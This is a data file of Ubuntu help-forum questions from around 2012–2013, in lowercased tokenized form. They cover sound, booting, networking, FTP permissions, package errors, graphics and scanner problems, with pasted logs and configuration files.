258060	what is the proper way to configure my sound ? [ 12.10 ]	so i am using the logitech g35 headset and it is usb . my sounds are much tinnier and just off compared to when i am on windows . on windows i do have access to the logitech gaming software which allows me to adjust the different frequencies . i do n't even have to touch the equalizer on windows , just raise the bass/treble sliders up a little . i installed pulseaudio-equalizer and it sounds horrible . if i raise the bass at all it gets terribly distorted . i noticed that pulseaudio-equalizer does n't have a preamp , even though i 've seen the preamp slider in old screenshots . i 've tried installing alsamixer but ca n't get past the make install part of the installation . i have the dependencies installed but i 'm getting an error that '/usr/lib/alsa-lib/ ' is not a directory . i do n't know what to do now so i 've given up on that . surely there must be an easy way to configure my bass/treble without needing to do all this .
258062	installed edubuntu from software center , but ca n't find it !	using 12.04.1 , installed edubuntu from the software center . the software center says everything is installed , but the search ca n't find any of the programs like tux math , tux paint , etc . i 'm used to 10.04 lts , on which it was really easy to find all the edubuntu software . where is it on 12.04 , hidden away somewhere ?
258065	computer wont boot	my computer was a windows 8 based pc . i downloaded ubuntu 12 10 and tried a dual boot . whenever i selected ubuntu , it would stay on for a couple of minutes and then power off . i tried to set the default os to ubuntu before this , and whenever i start it up , it does the same without ever taking me to the screen to select my os . i have absolutely no interface in it , it just stays black for a couple of minutes and then turns off . what do i need to do to fix this ?
258070	lost all networking after upgrade to ubuntu 12.04	i am running an old dell inspiron 1521 built in 2007 . i ran 11.10 on it and now have been running 12.04 lts since its launch . when i first installed , i had to run modprobe b43 on the broadcom minicard dw1490 card installed in the machine . upon the upgrade on or about 26 january 2013 , i lost all network connectivity whether connected to a cable through the lan or wireless . $ less /etc/network/interfaces auto lo iface lo inet loopback when i open my network tools , i get that the only network device available is the loopback interface ( lo ) . i really do n't want to have to install an os again just to get access to the network devices just so i can turn around and run it again to re-install ubuntu up to current .
258075	how do i import an mdf database file into mysql ?	i have an .mdf file ( which is supposed to have database ) . i 'm using ubuntu 12.10 . i want to import the database into mysql.5.5.28-0ubuntu0.12.10.2 ( ubuntu ) as this is version i 'm using for mysql .
258079	what is the technical reason preventing a simple upgrade ( non-destructive ) from 32 to 64-bit ?	i was under the impression that upgrading from 32-bit to 64-bit required a new kernel . this would mean replacing the kernel is all that would be needed . perhaps drivers and libraries need to be updated as well , right ? that could also be done in a non-destructive fashion . but all the other software does not need to be 64-bit specifically compiled does it ? so what then precisely , is the technical reason , why upgrading to 64-bit can not be done without reformatting with a one-click approach ?
258088	ubuntu 12.04 blank screen	ok so a year later i am asking again how do i update this computer everytime i update to 12.04 i have to reinstall at like 9.04 or what ever and then update works good till 12.04 never fails everytime blank screen why is this if you tell me the stuff to do i will run what ever so you can look at my syestem and tell me why ? last time i asked this question it was a dead duck but the computer is running now and update works right up to 12.04 then blank screen ps i think that the person who posts the question should close it
258090	wubi installer carrying in pendrive	can i copy all the downloaded wubi related files and use it for installation in other pcs ? ? ? please help me . i have an assignment tomorrow
258091	how to enable auto preview mp3 's on mouse over on ubuntu 12.10 ?	how to enable auto preview mp3 's on mouse over on ubuntu 12.10 . this feature was available in 11.04 but its not present in 12.10 . so how to enable it on ubuntu 12.10 .
258094	micromax 353g modem in ubuntu 12.04	i am using mmx 353g modem in windows and its working well but no matter what i do i can not make it work in ubuntu 12.04 . i have made a connection but it doesnt show up in connection list . i tried lot of things from different forums nothing seems to work for me , please help .
258098	no brightness control on macbookpro 7.1 ubunto 12.04	i have been trying to fix my brightness issue on my macbookpro 7.1 running snow leopard tried almost all suggestions . but nothing worked . tried modifying xorg.conf but it tells me i dont have permission to do so . tried different drivers and reinstalling the unit and nothing seemed to work . if anyone can put me out of my misery i will be soo happy : ) im literally spending my second week trying to fix this . i downgraded from 12.10 hoping that this issue would have been fixed in a lower update : (
258099	vsftpd 553 error : could not create file	fresh lamp server setup with ubuntu 12.04 and vsftpd . i 'm trying to access the /var/www folder ( web root ) with ftp user . i created a new user ftpuser and added it to the www-data user group created automatically by apache . home directory of that user is set to /var/www . i also changed the ownership of the /var/www to www-data group and changed permissions to 02775 . however , i 'm still not able to upload files . error is : `` 553 could not create file '' . can someone please explain me how to set these permissions properly ? what is the correct setup ? should i set the home directory of ftpuser to /var/www or somehow diffeerently ? i found a lot of topics on the web but none of them offer a universal solution . thank you ! update : here is the output of ls -l of /var/www : drwxr-sr-x 3 root ftpuser 4096 content of vsftpd.conf file : listen=yes anonymous_enable=no local_enable=yes write_enable=yes local_umask=022 dirmessage_enable=yes use_localtime=yes xferlog_enable=yes connect_from_port_20=yes chown_uploads=yes chown_username=ftpuser chroot_local_user=yes secure_chroot_dir=/var/run/vsftpd/empty pam_service_name=vsftpd rsa_cert_file=/etc/ssl/certs/ssl-cert-snakeoil.pem rsa_private_key_file=/etc/ssl/private/ssl-cert-snakeoil.key
258110	cpu performance decreases with ac power	i am doing cpu-intensive work on my thinkpad x220 laptop and i find the performance bad . interestingly , the cpu becomes more powerful if i disconnect the ac power and run only on battery ! it does slow down after a while though , probably because the cpu gets too hot . still i find the cpu too slow and i need to increase its performance somehow . i installed jupiter manager , but setting cpu to maximum performance from it did not change anything .
258111	how to install external monitor ?	so , i have a philips 190c monitor and an acer aspire 57321zg with amd hd 4570 and i want to know how in the world i can connect those to work properly ? i connect the monitor the following occurs : the desktop works fine the login screen 's resolution is 1280x768 ( my external monitor is using 1280x1024 ) i can not use displays separatly ( 1 resolution on laptop display and 1 resolution on external monitor ) , i need to disable one of them , i chose to disable laptop 's display . if i change the resolution from amd 's catalyst control center i get the following : the login screen 's resolution is the same as the desktop's in the right-down corner when i go with the cursor it freezes until i go with the cursor up if i upgrade video driver on 1280x1024 i can see only 3/4 of the desktop 1/4 ( at the bottom ) is black and the issues above remain.it only shows the whole desktop if i change the resolution from catalyst center but it has the downside that my mouse is freezing like before . so to point out the obvious : i 'm trying to have my display on the external monitor with desktop and login screen same resolution without mouse freezing or other side effects.and if possible the newest amd driver ( 13.1 ) without the 1/4 of black screen . heads up : i 'm not interested on how to install a driver , i know that , i do n't want to know how to `` plug-in '' a monitor on a laptop etc .
258112	error : when i try to install any package	i am using ubuntu 12.10 . i am in great trouble when i tried to install firefox browser . however firefox installation is broken on my system . after this when i go to ubuntu software center it showing me this message every time and fail to install any other package . ubuntu software center : item can not be installed or removed until the package catalog is repaired . when i try to install anything from terminal i always get this below message : error1 : the following packages have unmet dependencies : firefox-globalmenu : depends : firefox ( = 19.0~b5+build1-0ubuntu0.12.04.1~mfn1 ) please tell how i can repair it . looking for your guidance . ========================================================================== yes i just seen it and tried this command : apt-get -f install e : could not open lock file /var/lib/dpkg/lock - open ( 13 : permission denied ) e : unable to lock the administration directory ( /var/lib/dpkg/ ) , are you root ? please see from here what message i have : deepak @ deepak-laptop : / $ sudo apt-get -f install reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following extra packages will be installed : firefox firefox-globalmenu suggested packages : latex-xft-fonts firefox-gnome-support the following new packages will be installed : firefox the following packages will be upgraded : firefox-globa lmenu 1 upgraded , 1 newly installed , 0 to remove and 220 not upgraded . 1 not fully installed or removed . need to get 0 b/24.8 mb of archives . after this operation , 51.0 mb of additional disk space will be used . do you want to continue [ y/n ] ? y ( reading database ... 354341 files and directories currently installed . ) unpacking firefox ( from ... /firefox_19.0~b6+build1-0ubuntu0.12.04.1~mfn1_i386.deb ) ... dpkg : error processing /var/cache/apt/archives /firefox_19.0~b6+build1-0ubuntu0.12.04.1~mfn1_i386.deb ( -- unpack ) : trying to overwrite '/usr/lib/firefox/plugins ' , which is also in package acroread 9.5.1-1precise1 no apport report written because maxreports is reached already processing triggers for man-db ... processing triggers for desktop-file-utils ... processing triggers for bamfdaemon ... rebuilding /usr/share/applications/bamf.index ... processing triggers for gnome-menus ... errors were encountered while processing : /var/cache/apt/archives /firefox_19.0~b6+build1-0ubuntu0.12.04.1~mfn1_i386.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) ========================================================================== thanks
258115	converting a sequence of images to a video from terminal	is there a way to convert a sequence of images to a video from terminal ? specifically , the sequence of images are in .eps format ( filename_1.eps , filename_2.eps , ... , filename_99.eps , filename_100.eps ) and i want to convert them to .avi format i.e . to filename.avi .
258119	strange artifacting after dusting gfx card	i have a dusty room , so i decided to use compressed air to remove the dust from throughout my computer , including my graphics card . i used the compressed air to clear out my graphics card then put it back in . when i booted , right away i noticed the grub menu looked strange because the font looked 4x larger . ( this happens when i have my dvi cable plugged into the wrong dvi port , but it does n't matter anymore . ) when i tried to boot ubuntu i would get a purple screen for a long time followed by a black screen ... then nothing . after googling around on another computer i found that adding the `` nomodeset '' parameter to the grub boot options got me through to the log in . i am able to log in and use the computer , but now i have strange artifacting across the top of my screen and by cursor flickers . i figured i had damaged my graphics card , except i am able to boot into windows fine and run video games and graphics card tests . an interesting thing to note is the nvidia driver crashed when i started windows the first time after cleaning , but was fine after that . this is very strange to me , because the bugs seemed like a hardware error . i tried removing the graphics card and placing it back in , but that does n't seem to help at all . so far i have tried : taking gfx card out then back in updating uefi resetting cmos booting from thumb drive ubuntu ( same issue ) changing pci slot of gfx card cleaning gfx card connectors with alcohol and swab . i am using a asrock z77 extreme4 motherboard with a nvidia 670 gtx graphics card . any help is welcome . update : i bought a nvidia 210 graphics card and swapped it out for my current card . i get the exact same issues with a different nvidia card . i 'm not sure if i want to try another brand 's card . i am starting to wonder if this could be on the motherboard . i tried to boot into a fedora live usb , but get a blank screen , which is what i get on ubuntu unless i boot with nomodeset .
258120	error configuring php and mysql installed from source	i 'm using ubuntu 12.04. the system requires php5.2 and mysql5.1 . i installed php and mysql from source . i encountered the following problem while configuring php : ./configure \ -- prefix=/usr/share/php52 \ -- with-apxs2=/usr/local/apache2/bin/apxs \ -- enable-mbstring \ -- with-curl \ -- with-mysql \ -- enable-embedded-mysqli \ -- enable-exif \ -- with-mcrypt checking for mssql support via freetds ... no checking for mysql support ... yes checking for specified location of the mysql unix socket ... no checking for mysql unix socket location ... /tmp/mysql.sock configure : error : can not find mysql header files under yes . note that the mysql client library is not bundled anymore ! what should i do ? thanks in advance
258133	will eclipse update from the ubuntu repositories ?	if i install a default eclipse from the ubuntu program central , i get an eclipse with traces from the version helios and the screen that starts eclipse says indigo . the latest version of eclipse is called juno . it 's possible to download a separate download of eclipse juno and run it and link as mentioned : how do i install eclipse indigo 3.7.1 ? but the eclipse available from the central ubuntu reposotiries could update to version 4 ( juno ) and then we would not have to do the manual install . or how do i update a manual install ? i ca n't update the default install to juno . http : //www.eclipse.org/forums/index.php/t/438153/ this is the version we get from the ubuntu repositories and it ca n't be updated to eclipse juno , something is b0rked in `` object teams patch '' : version : 3.7.2 build id : i20110613-1736
258135	blocking all outgoing ports and its consequences	is this the right way to block all outgoing ports ? : ufw default deny outgoing but what are the consequences of doing this on amazon ec2 ? i 'm running possibly unsafe perl scripts on my instance and i do n't any of them to reach the internet .
258137	can multiple linux machines concurrently use a windows shared folder ?	is it a good idea to mount a windows-based folder share on multiple linux ( ubuntu ) machines ? would there be a performance drop ?
258142	why does n't my scanner work with 12.10 while it worked with 12.04 ?	i can not scan with ubuntu 12.10 . in ubuntu 12.04 i could scan with the same hardware . carsten @ carsten-a55vd : ~ $ simple-scan -d [ +0,00s ] debug : simple-scan.vala:582 : starting simple scan 3.6.0 , pid=4659 [ +0,00s ] debug : connecting to session manager [ +0,04s ] debug : ui.vala:1404 : restoring window to 999x601 pixels [ +0,04s ] debug : ui.vala:1409 : restoring window to maximized [ +0,07s ] debug : scanner.vala:1378 : sane_init ( ) - > sane_status_good [ +0,07s ] debug : scanner.vala:1384 : sane version 1.0.23 [ +0,07s ] debug : scanner.vala:1445 : requesting redetection of scan devices [ +0,07s ] debug : scanner.vala:753 : processing request [ +2,62s ] debug : simple-scan.vala:310 : requesting scan at 150 dpi from device ' ( null ) ' [ +2,62s ] debug : scanner.vala:1491 : scanner.scan ( `` ( null ) '' , dpi=150 , scan_mode=scanmode.gray , depth=2 , type=scantype.single , paper_width=0 , paper_height=0 ) [ +2,68s ] debug : scanner.vala:334 : sane_get_devices ( ) - > sane_status_good [ +2,68s ] debug : scanner.vala:346 : device : name= '' plustek : libusb:003:005 '' vendor= '' hewlett-packard '' model= '' scanjet 2200c '' type= '' flatbed scanner '' [ +2,68s ] debug : scanner.vala:753 : processing request [ +32,68s ] debug : scanner.vala:814 : sane_open ( `` plustek : libusb:003:005 '' ) - > sane_status_good [ +32,68s ] debug : scanner.vala:835 : sane_get_option_descriptor ( 0 ) [ +32,68s ] debug : scanner.vala:685 : option 0 : title='number of options ' type=int size=4 cap= , soft-detect [ +32,68s ] debug : scanner.vala:688 : description : read-only option that specifies how many options a specific devices supports . [ +32,68s ] debug : scanner.vala:835 : sane_get_option_descriptor ( 1 ) [ +32,68s ] debug : scanner.vala:685 : option 1 : name= ' ( null ) ' title='scan mode ' type=group size=4 [ +32,68s ] debug : scanner.vala:688 : description : [ +32,68s ] debug : scanner.vala:835 : sane_get_option_descriptor ( 2 ) [ +32,68s ] debug : scanner.vala:685 : option 2 : name='mode ' title='scan mode ' type=string size=8 values= [ `` lineart '' , `` gray '' , `` color '' ] cap= , soft-select , soft-detect [ +32,68s ] debug : scanner.vala:688 : description : selects the scan mode ( e.g. , lineart , monochrome , or color ) . [ +32,68s ] debug : scanner.vala:835 : sane_get_option_descriptor ( 3 ) [ +32,68s ] debug : scanner.vala:685 : option 3 : name='depth ' title='bit depth ' type=int size=4 unit=bits values= [ 8 , 14 ] cap= , soft-select , soft-detect [ +32,68s ] debug : scanner.vala:688 : description : number of bits per sample , typical values are 1 for `` line-art '' and 8 for multibit scans . [ +32,68s ] debug : scanner.vala:835 : sane_get_option_descriptor ( 4 ) [ +32,68s ] debug : scanner.vala:685 : option 4 : name='source ' title='scan source ' type=string size=13 values= [ `` normal '' , `` transparency '' , `` negative '' ] cap= , soft-select , soft-detect , inactive [ +32,68s ] debug : scanner.vala:688 : description : selects the scan source ( such as a document-feeder ) . [ +32,68s ] debug : scanner.vala:835 : sane_get_option_descriptor ( 5 ) [ +32,68s ] debug : scanner.vala:685 : option 5 : name='resolution ' title='scan resolution ' type=int size=4 unit=dpi min=50 , max=1200 , quant=0 cap= , soft-select , soft-detect [ +32,68s ] debug : scanner.vala:688 : description : sets the resolution of the scanned image . [ +32,68s ] debug : scanner.vala:835 : sane_get_option_descriptor ( 6 ) [ +32,68s ] debug : scanner.vala:685 : option 6 : name='preview ' title='preview ' type=bool size=4 cap= , soft-select , soft-detect [ +32,68s ] debug : scanner.vala:688 : description : request a preview-quality scan . [ +32,68s ] debug : scanner.vala:835 : sane_get_option_descriptor ( 7 ) [ +32,68s ] debug : scanner.vala:685 : option 7 : name= ' ( null ) ' title='geometry ' type=group size=4 cap= , advanced [ +32,68s ] debug : scanner.vala:688 : description : [ +32,68s ] debug : scanner.vala:835 : sane_get_option_descriptor ( 8 ) [ +32,68s ] debug : scanner.vala:685 : option 8 : name='tl-x ' title='top-left x ' type=fixed size=4 unit=mm min=0,000000 , max=215,000000 , quant=0 cap= , soft-select , soft-detect [ +32,68s ] debug : scanner.vala:688 : description : top-left x position of scan area . [ +32,68s ] debug : scanner.vala:835 : sane_get_option_descriptor ( 9 ) [ +32,68s ] debug : scanner.vala:685 : option 9 : name='tl-y ' title='top-left y ' type=fixed size=4 unit=mm min=0,000000 , max=297,000000 , quant=0 cap= , soft-select , soft-detect [ +32,68s ] debug : scanner.vala:688 : description : top-left y position of scan area . [ +32,68s ] debug : scanner.vala:835 : sane_get_option_descriptor ( 10 ) [ +32,68s ] debug : scanner.vala:685 : option 10 : name='br-x ' title='bottom-right x ' type=fixed size=4 unit=mm min=0,000000 , max=215,000000 , quant=0 cap= , soft-select , soft-detect [ +32,68s ] debug : scanner.vala:688 : description : bottom-right x position of scan area . [ +32,68s ] debug : scanner.vala:835 : sane_get_option_descriptor ( 11 ) [ +32,68s ] debug : scanner.vala:685 : option 11 : name='br-y ' title='bottom-right y ' type=fixed size=4 unit=mm min=0,000000 , max=297,000000 , quant=0 cap= , soft-select , soft-detect [ +32,68s ] debug : scanner.vala:688 : description : bottom-right y position of scan area . [ +32,68s ] debug : scanner.vala:835 : sane_get_option_descriptor ( 12 ) [ +32,68s ] debug : scanner.vala:685 : option 12 : name= ' ( null ) ' title='enhancement ' type=group size=4 [ +32,68s ] debug : scanner.vala:688 : description : [ +32,68s ] debug : scanner.vala:835 : sane_get_option_descriptor ( 13 ) [ +32,68s ] debug : scanner.vala:685 : option 13 : name='brightness ' title='brightness ' type=fixed size=4 unit=percent min=-100,000000 , max=100,000000 , quant=65536 cap= , soft-select , soft-detect [ +32,68s ] debug : scanner.vala:688 : description : controls the brightness of the acquired image . [ +32,68s ] debug : scanner.vala:835 : sane_get_option_descriptor ( 14 ) [ +32,68s ] debug : scanner.vala:685 : option 14 : name='contrast ' title='contrast ' type=fixed size=4 unit=percent min=-100,000000 , max=100,000000 , quant=65536 cap= , soft-select , soft-detect [ +32,68s ] debug : scanner.vala:688 : description : controls the contrast of the acquired image . [ +32,68s ] debug : scanner.vala:835 : sane_get_option_descriptor ( 15 ) [ +32,68s ] debug : scanner.vala:685 : option 15 : name='custom-gamma ' title='use custom gamma table ' type=bool size=4 cap= , soft-select , soft-detect [ +32,68s ] debug : scanner.vala:688 : description : determines whether a builtin or a custom gamma-table should be used . [ +32,68s ] debug : scanner.vala:835 : sane_get_option_descriptor ( 16 ) [ +32,68s ] debug : scanner.vala:685 : option 16 : name='gamma-table ' title='image intensity ' type=int size=16384 min=0 , max=255 , quant=0 cap= , soft-select , soft-detect , inactive [ +32,68s ] debug : scanner.vala:688 : description : gamma-correction table . in color mode this option equally affects the red , green , and blue channels simultaneously ( i.e. , it is an intensity gamma table ) . [ +32,68s ] debug : scanner.vala:835 : sane_get_option_descriptor ( 17 ) [ +32,69s ] debug : scanner.vala:685 : option 17 : name='red-gamma-table ' title='red intensity ' type=int size=16384 min=0 , max=255 , quant=0 cap= , soft-select , soft-detect , inactive [ +32,69s ] debug : scanner.vala:688 : description : gamma-correction table for the red band . [ +32,69s ] debug : scanner.vala:835 : sane_get_option_descriptor ( 18 ) [ +32,69s ] debug : scanner.vala:685 : option 18 : name='green-gamma-table ' title='green intensity ' type=int size=16384 min=0 , max=255 , quant=0 cap= , soft-select , soft-detect , inactive [ +32,69s ] debug : scanner.vala:688 : description : gamma-correction table for the green band . [ +32,69s ] debug : scanner.vala:835 : sane_get_option_descriptor ( 19 ) [ +32,69s ] debug : scanner.vala:685 : option 19 : name='blue-gamma-table ' title='blue intensity ' type=int size=16384 min=0 , max=255 , quant=0 cap= , soft-select , soft-detect , inactive [ +32,69s ] debug : scanner.vala:688 : description : gamma-correction table for the blue band . [ +32,69s ] debug : scanner.vala:835 : sane_get_option_descriptor ( 20 ) [ +32,69s ] debug : scanner.vala:685 : option 20 : name= ' ( null ) ' title='device-settings ' type=group size=4 [ +32,69s ] debug : scanner.vala:688 : description : [ +32,69s ] debug : scanner.vala:835 : sane_get_option_descriptor ( 21 ) [ +32,69s ] debug : scanner.vala:685 : option 21 : name='lamp-switch ' title='lampswitch ' type=bool size=4 cap= , soft-select , soft-detect [ +32,69s ] debug : scanner.vala:688 : description : manually switching the lamp ( s ) . [ +32,69s ] debug : scanner.vala:835 : sane_get_option_descriptor ( 22 ) [ +32,69s ] debug : scanner.vala:685 : option 22 : name='lampoff-time ' title='lampoff-time ' type=int size=4 min=0 , max=999 , quant=1 cap= , soft-select , soft-detect [ +32,69s ] debug : scanner.vala:688 : description : lampoff-time in seconds . [ +32,69s ] debug : scanner.vala:835 : sane_get_option_descriptor ( 23 ) [ +32,69s ] debug : scanner.vala:685 : option 23 : name='lamp-off-at-exit ' title='lamp off at exit ' type=bool size=4 cap= , soft-select , soft-detect [ +32,69s ] debug : scanner.vala:688 : description : turn off lamp when program exits [ +32,69s ] debug : scanner.vala:835 : sane_get_option_descriptor ( 24 ) [ +32,69s ] debug : scanner.vala:685 : option 24 : name='warmup-time ' title='warmup-time ' type=int size=4 min=-1 , max=999 , quant=1 cap= , soft-select , soft-detect [ +32,69s ] debug : scanner.vala:688 : description : warmup-time in seconds . [ +32,69s ] debug : scanner.vala:835 : sane_get_option_descriptor ( 25 ) [ +32,69s ] debug : scanner.vala:685 : option 25 : name='lamp-off-during-dcal ' title='lamp off during dark calibration ' type=bool size=4 cap= , soft-select , soft-detect , inactive [ +32,69s ] debug : scanner.vala:688 : description : always switches lamp off when doing dark calibration . [ +32,69s ] debug : scanner.vala:835 : sane_get_option_descriptor ( 26 ) [ +32,69s ] debug : scanner.vala:685 : option 26 : name='calibration-cache ' title='calibration data cache ' type=bool size=4 cap= , soft-select , soft-detect [ +32,69s ] debug : scanner.vala:688 : description : enables or disables calibration data cache . [ +32,69s ] debug : scanner.vala:835 : sane_get_option_descriptor ( 27 ) [ +32,69s ] debug : scanner.vala:685 : option 27 : name='speedup-switch ' title='speedup sensor ' type=bool size=4 cap= , soft-select , soft-detect [ +32,69s ] debug : scanner.vala:688 : description : enables or disables speeding up sensor movement . [ +32,69s ] debug : scanner.vala:835 : sane_get_option_descriptor ( 28 ) [ +32,69s ] debug : scanner.vala:685 : option 28 : name='calibrate ' title='calibrate ' type=button size=4 cap= , soft-select , soft-detect , automatic , inactive [ +32,69s ] debug : scanner.vala:688 : description : performs calibration [ +32,69s ] debug : scanner.vala:835 : sane_get_option_descriptor ( 29 ) [ +32,69s ] debug : scanner.vala:685 : option 29 : name= ' ( null ) ' title='analog frontend ' type=group size=4 cap= , advanced [ +32,69s ] debug : scanner.vala:688 : description : [ +32,69s ] debug : scanner.vala:835 : sane_get_option_descriptor ( 30 ) [ +32,69s ] debug : scanner.vala:685 : option 30 : name='red-gain ' title='red gain ' type=int size=4 min=-1 , max=63 , quant=1 cap= , soft-select , soft-detect [ +32,69s ] debug : scanner.vala:688 : description : red gain value of the afe [ +32,69s ] debug : scanner.vala:835 : sane_get_option_descriptor ( 31 ) [ +32,69s ] debug : scanner.vala:685 : option 31 : name='green-gain ' title='green gain ' type=int size=4 min=-1 , max=63 , quant=1 cap= , soft-select , soft-detect [ +32,69s ] debug : scanner.vala:688 : description : green gain value of the afe [ +32,69s ] debug : scanner.vala:835 : sane_get_option_descriptor ( 32 ) [ +32,69s ] debug : scanner.vala:685 : option 32 : name='blue-gain ' title='blue gain ' type=int size=4 min=-1 , max=63 , quant=1 cap= , soft-select , soft-detect [ +32,69s ] debug : scanner.vala:688 : description : blue gain value of the afe [ +32,69s ] debug : scanner.vala:835 : sane_get_option_descriptor ( 33 ) [ +32,69s ] debug : scanner.vala:685 : option 33 : name='red-offset ' title='red offset ' type=int size=4 min=-1 , max=63 , quant=1 cap= , soft-select , soft-detect [ +32,69s ] debug : scanner.vala:688 : description : red offset value of the afe [ +32,69s ] debug : scanner.vala:835 : sane_get_option_descriptor ( 34 ) [ +32,69s ] debug : scanner.vala:685 : option 34 : name='green-offset ' title='green offset ' type=int size=4 min=-1 , max=63 , quant=1 cap= , soft-select , soft-detect [ +32,69s ] debug : scanner.vala:688 : description : green offset value of the afe [ +32,69s ] debug : scanner.vala:835 : sane_get_option_descriptor ( 35 ) [ +32,69s ] debug : scanner.vala:685 : option 35 : name='blue-offset ' title='blue offset ' type=int size=4 min=-1 , max=63 , quant=1 cap= , soft-select , soft-detect [ +32,69s ] debug : scanner.vala:688 : description : blue offset value of the afe [ +32,69s ] debug : scanner.vala:835 : sane_get_option_descriptor ( 36 ) [ +32,69s ] debug : scanner.vala:685 : option 36 : name='redlamp-off ' title='red lamp off ' type=int size=4 min=-1 , max=16363 , quant=1 cap= , soft-select , soft-detect , inactive [ +32,69s ] debug : scanner.vala:688 : description : defines red lamp off parameter [ +32,69s ] debug : scanner.vala:835 : sane_get_option_descriptor ( 37 ) [ +32,69s ] debug : scanner.vala:685 : option 37 : name='greenlamp-off ' title='green lamp off ' type=int size=4 min=-1 , max=16363 , quant=1 cap= , soft-select , soft-detect , inactive [ +32,69s ] debug : scanner.vala:688 : description : defines green lamp off parameter [ +32,69s ] debug : scanner.vala:835 : sane_get_option_descriptor ( 38 ) [ +32,69s ] debug : scanner.vala:685 : option 38 : name='bluelamp-off ' title='blue lamp off ' type=int size=4 min=-1 , max=16363 , quant=1 cap= , soft-select , soft-detect , inactive [ +32,69s ] debug : scanner.vala:688 : description : defines blue lamp off parameter [ +32,69s ] debug : scanner.vala:835 : sane_get_option_descriptor ( 39 ) [ +32,69s ] debug : scanner.vala:685 : option 39 : name= ' ( null ) ' title='buttons ' type=group size=4 cap= , advanced [ +32,69s ] debug : scanner.vala:688 : description : [ +32,69s ] debug : scanner.vala:835 : sane_get_option_descriptor ( 40 ) [ +32,69s ] debug : scanner.vala:685 : option 40 : name='button 0 ' title='scanner button 0 ' type=bool size=4 cap= , hard-select , soft-detect , advanced [ +32,69s ] debug : scanner.vala:688 : description : this option reflects the status of the scanner buttons . [ +32,69s ] debug : scanner.vala:835 : sane_get_option_descriptor ( 41 ) [ +32,69s ] debug : scanner.vala:685 : option 41 : name='button 1 ' title='scanner button 1 ' type=bool size=4 cap= , hard-select , soft-detect , advanced [ +32,69s ] debug : scanner.vala:688 : description : this option reflects the status of the scanner buttons . [ +32,69s ] debug : scanner.vala:835 : sane_get_option_descriptor ( 42 ) [ +32,69s ] debug : scanner.vala:685 : option 42 : name='button 2 ' title='scanner button 2 ' type=bool size=4 cap= , hard-select , soft-detect , inactive , advanced [ +32,69s ] debug : scanner.vala:688 : description : this option reflects the status of the scanner buttons . [ +32,69s ] debug : scanner.vala:835 : sane_get_option_descriptor ( 43 ) [ +32,69s ] debug : scanner.vala:685 : option 43 : name='button 3 ' title='scanner button 3 ' type=bool size=4 cap= , hard-select , soft-detect , inactive , advanced [ +32,69s ] debug : scanner.vala:688 : description : this option reflects the status of the scanner buttons . [ +32,69s ] debug : scanner.vala:835 : sane_get_option_descriptor ( 44 ) [ +32,69s ] debug : scanner.vala:685 : option 44 : name='button 4 ' title='scanner button 4 ' type=bool size=4 cap= , hard-select , soft-detect , inactive , advanced [ +32,69s ] debug : scanner.vala:688 : description : this option reflects the status of the scanner buttons . [ +32,69s ] debug : scanner.vala:835 : sane_get_option_descriptor ( 45 ) [ +32,69s ] debug : scanner.vala:497 : sane_control_option ( 2 , sane_action_set_value , `` gray '' ) - > ( sane_status_good , `` gray '' ) [ +32,69s ] debug : scanner.vala:439 : sane_control_option ( 5 , sane_action_set_value , 150 ) - > ( sane_status_good , 150 ) [ +32,69s ] debug : scanner.vala:439 : sane_control_option ( 3 , sane_action_set_value , 2 ) - > ( sane_status_good , 8 ) [ +32,69s ] debug : scanner.vala:479 : sane_control_option ( 10 , sane_action_set_value , 215,000000 ) - > ( sane_status_good , 215,000000 ) [ +32,69s ] debug : scanner.vala:479 : sane_control_option ( 11 , sane_action_set_value , 297,000000 ) - > ( sane_status_good , 297,000000 ) [ +62,69s ] debug : scanner.vala:1141 : sane_start ( page=0 , pass=0 ) - > sane_status_io_error [ +62,69s ] warning : scanner.vala:1148 : unable to start device : error during device i/o [ +62,69s ] debug : scanner.vala:715 : sane_cancel ( ) [ +62,69s ] debug : scanner.vala:718 : sane_close ( ) [ +70,21s ] debug : scanner.vala:1515 : stopping scan thread [ +70,21s ] debug : scanner.vala:753 : processing request [ +70,21s ] debug : scanner.vala:1523 : sane_exit ( ) how do i resolve the issue ? carsten @ carsten-a55vd : ~ $ sane-find-scanner # sane-find-scanner will now attempt to detect your scanner . if the # result is different from what you expected , first make sure your # scanner is powered up and properly connected to your computer . # no scsi scanners found . if you expected something different , make sure that # you have loaded a kernel scsi driver for your scsi adapter . could not open usb device 0x8087/0x0024 at 001:002 : access denied ( insufficient permissions ) could not open usb device 0x8087/0x0024 at 002:002 : access denied ( insufficient permissions ) found usb scanner ( vendor=0x03f0 [ hewlett-packard ] , product=0x0605 [ hp scanjet 2200c ] ) at libusb:003:006 could not open usb device 0x0781/0x5571 at 003:002 : access denied ( insufficient permissions ) could not open usb device 0x045e/0x0745 at 003:003 : access denied ( insufficient permissions ) could not open usb device 0x1d6b/0x0002 at 001:001 : access denied ( insufficient permissions ) could not open usb device 0x1d6b/0x0002 at 002:001 : access denied ( insufficient permissions ) could not open usb device 0x1d6b/0x0002 at 003:001 : access denied ( insufficient permissions ) could not open usb device 0x1d6b/0x0003 at 004:001 : access denied ( insufficient permissions ) could not open usb device 0x04f2/0xb354 at 001:003 : access denied ( insufficient permissions ) # your usb scanner was ( probably ) detected . it may or may not be supported by # sane . try scanimage -l and read the backend 's manpage . # not checking for parallel port scanners . # most scanners connected to the parallel port or other proprietary ports # ca n't be detected by this program . # you may want to run this program as root to find all devices . once you # found the scanner devices , be sure to adjust access permissions as # necessary . carsten @ carsten-a55vd : ~ $ scanimage -l device `plustek : libusb:003:006 ' is a hewlett-packard scanjet 2200c flatbed scanner carsten @ carsten-a55vd : ~ $ the scanner is a hewlett-packard scanjet 2200c .
